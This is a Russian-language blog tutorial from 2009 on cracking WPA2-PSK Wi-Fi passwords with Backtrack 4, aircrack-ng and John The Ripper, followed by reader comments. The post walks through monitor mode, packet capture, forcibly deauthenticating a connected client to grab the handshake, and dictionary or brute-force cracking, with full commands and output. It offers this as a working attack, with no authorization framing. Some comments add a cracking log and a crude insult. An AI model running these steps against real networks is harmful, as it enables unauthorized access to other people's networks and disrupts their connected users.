Linux и Windows: помощь админам и пользователям

Администрируем и настраиваем Windows, Linux.



Взламываем WPA2 PSK используя Backtrack 4, aircrack-ng и John The Ripper

Рубрика: Разное
Метки: | | |
Вторник, 3 марта 2009 г.
Просмотров: 16674
Подписаться на комментарии по RSS

Этапы взлома :

  • Переводим интерфейс в "monitor mode"
  • Находим сети защищенные с помощью WPA2 и Pre Shared Key
  • Захватываем все пакеты
  • Деавторизуем клиента, для захвата начального обмена пакетами.
  • Взламываем ключ используя словари (или с помощью John The Ripper)

 Я использовал карточку Dlink DWL-G122 (USB) во время написания данной статьи. В Backtrack4 данное устройство видно под именем wlan0.

Доставка грузов в Китай контейнерными перевозками является одним из самых надежных и недорогих способов перевозки. Обращайтесь к нам за подробностями.

Для начала переводим карту в режим "monitor mode" :

root@bt:~# airmon-ng 
Interface       Chipset         Driver
wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath1            Atheros         madwifi-ng VAP (parent: wifi0)
wlan0           Ralink 2573 USB rt73usb - [phy0]
root@bt:~# airmon-ng start wlan0
Interface       Chipset         Driver
wifi0           Atheros         madwifi-ng
ath0            Atheros         madwifi-ng VAP (parent: wifi0)
ath1            Atheros         madwifi-ng VAP (parent: wifi0)
wlan0           Ralink 2573 USB rt73usb - [phy0]
                                (monitor mode enabled on mon0)

Сделано, и теперь мы можем использовать карту как mon0

Теперь сканим доступные беспроводные сети, использующие WPA2 / PSK :

root@bt:~# airodump-ng mon0
 CH  6 ][ Elapsed: 4 s ][ 2009-02-21 12:57                                         
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                    
 00:19:5B:52:AD:F7  -33        5        0    0  10  54   WPA2 CCMP   PSK  TestNet                                                  
 BSSID              STATION            PWR   Rate   Lost  Packets  Probe                                                            
 00:19:5B:52:AD:F7  00:1C:BF:90:5B:A3  -29   0- 1     12        4  TestNet

Остановите airodump-ng и запустите его заново, записывая все пакеты в файл:

airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2

В данный момент мы имеем два варианта развития событий: либо дем пока клиент совершит подключение и произойдет процедура авторизации, либо деавторизуем подключенного клиента и тем самым заставим его переподключиться. Время - деньги, поэтому давайте проведем небольшой акт насилия. Нам необходимы bssid точки доступа (-a) и mac адрес подключенного клиента (-c)

root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0
13:04:19  Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10
13:04:20  Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]

В результате airodump-ng должен показать “WPA Handshake:” в правом верхнем углу:

 CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7                                         
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                
 00:19:5B:52:AD:F7  -33 100     1338       99    0  10  54   WPA2 CCMP   PSK  TestNet                                              
 BSSID              STATION            PWR   Rate   Lost  Packets  Probe                                                           
 00:19:5B:52:AD:F7  00:1C:BF:90:5B:A3  -27  54-54      0      230

Остановите airodump-ng и убедитесь что все необходимые файлы созданы

root@bt:/# ls /tmp/wpa2* -al
-rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap
-rw-r--r-- 1 root root   476 2009-02-21 13:04 /tmp/wpa2-01.csv
-rw-r--r-- 1 root root   590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv

С этого момента вам не нужно быть где то неподалеку от точки доступа. Весь взлом будет происходить оффлайн, поэтому вы можете остановить airodump и другие процессы. В действительности, вы можете запустить процесс взлома и идти спать, гулять и прочее... Взлом WPA2 PSK базируется на брутфорсе, и может занять длительное время. Существует два пути взлома: первый довольно быстрый, но не гарантирует успеха, а второй довольно медленный, но гарантирует что рано или поздно вы найдете ключ.

Первый метод основывается на списках/словарях. Большое количество данных файлов вы можете найти в интернете (например www.theargon.com), или вы можете сгенерировать его самостоятельно используя утилиты, подобные John The Ripper. Как только словарь создан, вы можете запустить aircrack-ng с данным словарем и файлом .cap, который содержитWPA2 Handshake.

aircrack-ng –w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap
 
Успешность взлома напрямую зависит от сложности пароля. Другими словами, вам может повезти и вы найдете ключ сразу, или не найдете его совсем.
Следующий метод, брутфорс, будет успешным практически наверняка, но может занять очень длительный срок. Необходимо понимать, что ключ WPA2 может содержать до 64-ех символов. Для начала взлома, если вы хотите использовать John The Ripper для создания всех возможных парольных комбинаций, выполните следующую команду.
 
root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap

Постовой

Надежные грузоперевозки по России: срочная доставка грузов в Екатеринбург. Разветвленная сеть филиалов.

]]>twitter.com Google Buzz google.com bobrdobr.ru del.icio.us technorati.com linkstore.ru news2.ru rumarkz.ru memori.ru moemesto.ru]]>

Еще записи по теме

Комментариев: 34

  1. 2009-04-27 в 14:03:34 | troy (анонимно)

    Как насчет использования EWSA от Elcomsoft для брута? Кто-нибудь пробовал его именно для этого случая? Как заимпортировать файлы для брута?

  2. 2009-04-28 в 20:51:57 | vovan (анонимно)

    Не могу войти в BackTrack4 логин root вводиться а при попытке вводе пароля клава перестает работать, ни одна кнопка кроме Enter не работает, в итоге через 60 сек. меня выбрасывает заново вводить пароль или при вводе без пароля просто нажатием Enter аналогично выбрасывает и клава снова работает. Такая же ерунда при загрузке диска slitaz-aircrack-ng. Подскаите решение или как обойти эту проблему.

  3. 2009-04-30 в 11:46:45 | Михаил (анонимно)

    Спасибо за хорошую информацию! А как в BackTrack4 взламывать WEP ? Спасибо взарание!

    P.S. Я использывал ZD1211rw(usb adapter) ---WPA2 работает!

  4. 2009-05-10 в 21:24:16 | Semby (анонимно)

    кто подскажет,как создать словарь для взлома WPA,никак не могу подобрать ключ к точке.

    заранее благодарю ,с уважением # semby # Spain.

  5. 2009-05-10 в 21:46:45 | Semby (анонимно)

    вводишь где логин # root Enter

    потом ,в пустой строке, там ничего не будет прописываться,всеравно пишешь #toor Enter

    root@bt:~# startx Enter

  6. 2009-05-16 в 06:23:04 | RomS (анонимно)

    Люди, подскажите есть ли пособие по "употреблению" BackTrack или подобных к ему дистрибутивам?

    З.Ы. Очень хочу научиться юзать эту машину, помогите...

  7. 2009-05-24 в 18:49:39 | Dron (анонимно)

    Простой вопрос - зачем взламывать точки? Не проще обратиться к психтерапевту?

  8. 2009-05-25 в 11:50:32 | Frame
    ]]>]]>

    Нет, не проще. В дискуссию вступать не буду, судя по вопросу это бесполезно.

  9. 2009-06-12 в 00:50:56 | NV (анонимно)

    airodump-ng как его остановить ?????

  10. 2009-06-17 в 17:27:01 | Аноним (анонимно)

    Ctrl+Z

  11. 2009-06-18 в 17:56:14 | Вячеслав (анонимно)

    Ctrl+C

  12. 2009-08-02 в 18:52:38 | вася (анонимно)

    кто может подсказать там где знак | root@bt:~# /pentest/password/jtr/john --stdout --incremental:all вот здесь | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap надо писать все вместе или раздельно ?

  13. 2009-08-04 в 05:57:34 | Аноним (анонимно)

    Alt+Ctrl+Del or Reset

  14. 2009-09-01 в 18:06:48 | Комментатор 19
    ]]>]]>

    kakoj slovar optimalnuj?

  15. 2009-10-14 в 02:21:15 | ser#039;ezno (анонимно)

    этот мануал для 2 вифи карт ?

  16. 2009-10-15 в 02:59:29 | Zmey (анонимно)

    НАрод вы долбаны и страдаете полной фигней так как взлом впа2 не возможен за исключением брута который будет длится годами, минимальная длина символов пароля для ацес поинта 26 прикинте количетво комбинаций с учетом букв вернего и нижнего регистра и еще цифр,вам лечится нада)))

  17. 2009-10-17 в 16:16:43 | serg (анонимно)

    1милион пасов в секунду. думаю ето не займет много времени

  18. 2009-10-18 в 20:49:32 | SanSarych (анонимно)

    Лечится надо вам, а ВПА2 взламывается за 15 минут...

    технологии пока незнаю. в сети уже должно было просачится.

  19. 2009-10-27 в 23:02:06 | Massarash (анонимно)

    to SanSarych Это тебе надо лечится. ВПА2 за 15 минут.... Гониш ты паря. пароль на WEP я открываю за 5 минут максимум, с WPA такое не пройдёт. Может ты скажешь, что и WiMax со своими протоколами - друшлаг?

  20. 2009-11-15 в 20:34:35 | Kos (анонимно)

    а фигли тут думать? При 26 символах с учетом верхнего-нижнего регистров и цифр полный перебор по 1 млн. паролей в секунду займет около 9 месяцев. Лучше ёжика родите.

  21. 2009-11-23 в 23:26:06 | Дмитрий (анонимно)

    А учитывая то, что есть прошаренные люди, которые с помощью генератора случайных чисел задают нормальные пароли, например во все 63 символа с учетом верхнего и нижнего регистров да еще и с цифрами и вместо TKIP юзают AES... Мне жалко вас ребята...

    Интересно, сколько вы будете например вот такой ключик подбирать: lEqiFRnG9KdXt2i1WpNYCNo56D2FxtUyKciEqz1QU1bqGFD0BB5en0SOveQIDpa

    Лучше потратьте время с пользой. smile

  22. 2009-11-24 в 01:40:06 | Frame
    ]]>]]>

    о да. Это не прошареные люди, это любители гомосятины.

  23. 2009-12-08 в 18:52:41 | vitaliy petrovich (анонимно)

    У меня такой вопрос, пароль не wpa2 а wpa, при сбрасывании авторизации не происходит хендшейк. Хелп ми ^^ Или для wpa используется другой алгоритм?

  24. 2009-12-21 в 13:14:45 | Аноним (анонимно)

    берем видюху с cuda и ,, перебираем пароли со скоростью 350 млн , в секунду

  25. 2009-12-22 в 20:00:10 | Tverskoy (анонимно)
    # 2009-12-21 в 13:14:45 | Аноним (анонимно)
    берем видюху с cuda и ,, перебираем пароли со скоростью 350 млн , в секунду

    Ути какой умный... 350 млн. паролей в секунду? А что не миллиард?

    Заходим на опенсорс проект по КУДЕ и видим что с четырьмя 295ми Джифорсами максимум 85 тысяч паролей в секунду...

    т.е. все английские символы одного регистра плюс циферки - 1 год перебора smile

    http://code.google.com/p/pyrit/

  26. 2009-12-31 в 11:59:58 | fr0ster (анонимно)

    Это все конечно хорошо и правильно... с точки зрения теории и генеральной линии КПСС, но прошареных пользователей меньше, чем точек доступа, а длиннючие "случайные" пароли генерит программа, и в действительности это псевдо-случайный пароль. Учитывая же, что задача взлома точки доступа это в 90% поиск любой слабозащищенной точки или проверка своей на гнилость, то метод брутфорса себя оправдывает.

    ЗЫ Есть люди не меняющие даже стандартный пароль по умолчанию, а вы про продвинутость.

    ЗЗЫ Если у когото появится необходимость сломать защиту конкретной точки, то всегда есть и иные средства.

  27. 2010-01-05 в 19:16:30 | RedAcid (анонимно)

    Привет всем! У меня не происходит хендшейк при сбросе авторизации. Сеть Wpa+WPA2 Personal Плиз хелп

  28. 2010-01-06 в 01:55:43 | Vodka (анонимно)

    Привет всем. У меня тоже нет хендшейка. WPA2. Кто-нибудь сталкивался?

  29. 2010-01-22 в 05:09:36 | Аноним (анонимно)

    Net handshake celj ne wpa2 a prostenjkaja WPA ocenj izvenjajusj za shrift smile

    Spisok sovmestimostej wifi kart vrode proshjel.

  30. 2010-01-24 в 13:24:46 | jsfq (анонимно)

    надо быть полным параноиком или иметь инет по стопицот рублей за мегабайт, чтобы поставить такой пароль smile

  31. 2010-02-03 в 06:54:23 | Аноним (анонимно)

    надо сидеть и ждать пока клиент не сделает подключение я оставлял комп на сутки а то и больше в засаде иногда удавалось словить а когда и полный голяк так-что пыхтите это как повезёт почти также как и со словарём слова нет и всё впустую

    08:25:42] 11083904 keys tested (373.46 k/s) Current passphrase: ~schwert~

    Master Key : 05 D2 D2 64 82 BA D8 2D BE E6 64 37 AE 4D 87 8E

    57 05 2D D7 EB A5 7D 3E 11 0E F6 BC F4 E8 30 7C

    Transient Key : 6A 02 95 9B 9A A3 D3 AF E5 FE 47 D6 74 BF 25 C1

    D5 D4 6F 23 35 4A 75 D5 32 1A 31 52 13 B3 C3 55

    E8 2A 5C 5C D8 9C 44 3B 77 96 A1 70 A5 32 66 6F

    E6 1C E6 89 75 5C 45 7B 05 4C 26 61 14 2C 2A 8E

    EAPOL HMAC : 2C 14 DB 2B F4 8F F2 7A FD D0 6E C5 F5 2D BC DF

    Passphrase not in dictionary вот такой мой ответ

  32. 2010-02-26 в 03:23:32 | Egor (анонимно)

    Ребят, подскажите, через убунту свою (9.10 Kern....) не могу подцепиться к вайфаю на висте с защитой wap2.... пропадает значек вайфая вообще.. Если на висте создаю соединение без защиты, то спокойно цепляюсь (( В чем трабла кто подскажет?

  33. 2010-03-01 в 02:52:17 | юрий (анонимно)

    root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap

    как использовать эту команду в debian??? подскажите, пожалуйста

  34. 2010-03-01 в 02:53:48 | юрий (анонимно)

    даже если меняю путь, то результата никакого...

Оставьте комментарий!

Не регистрировать/аноним

Используйте нормальные имена.

Если вы уже зарегистрированы как комментатор или хотите зарегистрироваться, укажите пароль и свой действующий email.
(При регистрации на указанный адрес придет письмо с кодом активации и ссылкой на ваш персональный аккаунт, где вы сможете изменить свои данные, включая адрес сайта, ник, описание, контакты и т.д.)


(обязательно)